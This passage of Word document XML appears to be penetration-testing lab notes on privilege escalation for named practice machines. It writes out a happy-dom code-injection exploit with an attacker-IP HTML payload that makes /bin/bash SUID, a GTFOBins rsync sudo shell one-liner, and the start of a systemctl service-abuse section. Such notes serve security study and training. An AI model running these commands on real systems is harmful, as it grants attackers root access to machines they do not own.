    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId681">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Wallpaperhub</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FD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command, /usr/bin/web-scraper, is a symlink to /opt/scraper/scraper.js, a web scraping tool that imports the vulnerable happy-dom package. Research has shown that happy-dom is susceptible to arbitrary code injection (CVE-2024-51757).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FDA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit this, first craft a malicious HTML payload. On the target machine, execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FDC">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This creates an executable script that, when run, sets the SUID bit on /bin/bash. Next, craft an HTML file that will trigger this script. Create the payload file with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "chmod 4777 /bin/bash" &gt; /tmp/pwn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "4" is for SUID and "777" means everyone has all permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x /tmp/pwn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Replace 172.16.73.1 with your attacker machine’s IP address.) On your attacking machine, start a simple HTTP server to serve this file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "`&lt;script src=\"http://172.16.73.1:1337/'+require('child_process').execSync('/tmp/pwn')+'\"&gt;&lt;/script&gt;`" &gt; /tmp/pwn.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 1337</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE6">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, exploit the vulnerability by leveraging a path traversal in the web scraper. Run the following command as wp_hub to supply the malicious HTML payload to the tool:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u root /usr/bin/web-scraper /root/web_src_downloaded/../../tmp/pwn.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output will include various links, and notably the JavaScript link that triggers the execution of our payload. After the exploit runs, verify that the SUID bit has been set on /bin/bash by checking its permissions:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You should see /bin/bash have SUID bit set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1451"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FEF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g748qesdz6k1" w:id="274"/>
      <w:bookmarkEnd w:id="274"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/rsync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId682">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zab</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FF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3338513" cy="1457485"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="103" name="image107.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image107.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId683"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3338513" cy="1457485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simply run the one-liner from GTFOBins!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo rsync -e 'sh -c "sh 0&lt;&amp;2 1&gt;&amp;2"' 127.0.0.1:/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FF9">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FFA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FFB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qnmqme7yc5fp" w:id="275"/>
      <w:bookmarkEnd w:id="275"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/systemctl restart spiderbackup.service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId684">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Spidersociety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1FFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FFE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1041400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72" name="image57.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image57.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId685"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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1FFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1494"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1494"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/systemctl restart spiderbackup.service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002001">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002002">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002003">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1409700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="19" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId686"/>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2004">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linPEAS found two spiderbackup.service files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002005">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002006">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="736600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="264" name="image268.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image268.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId687"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="736600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
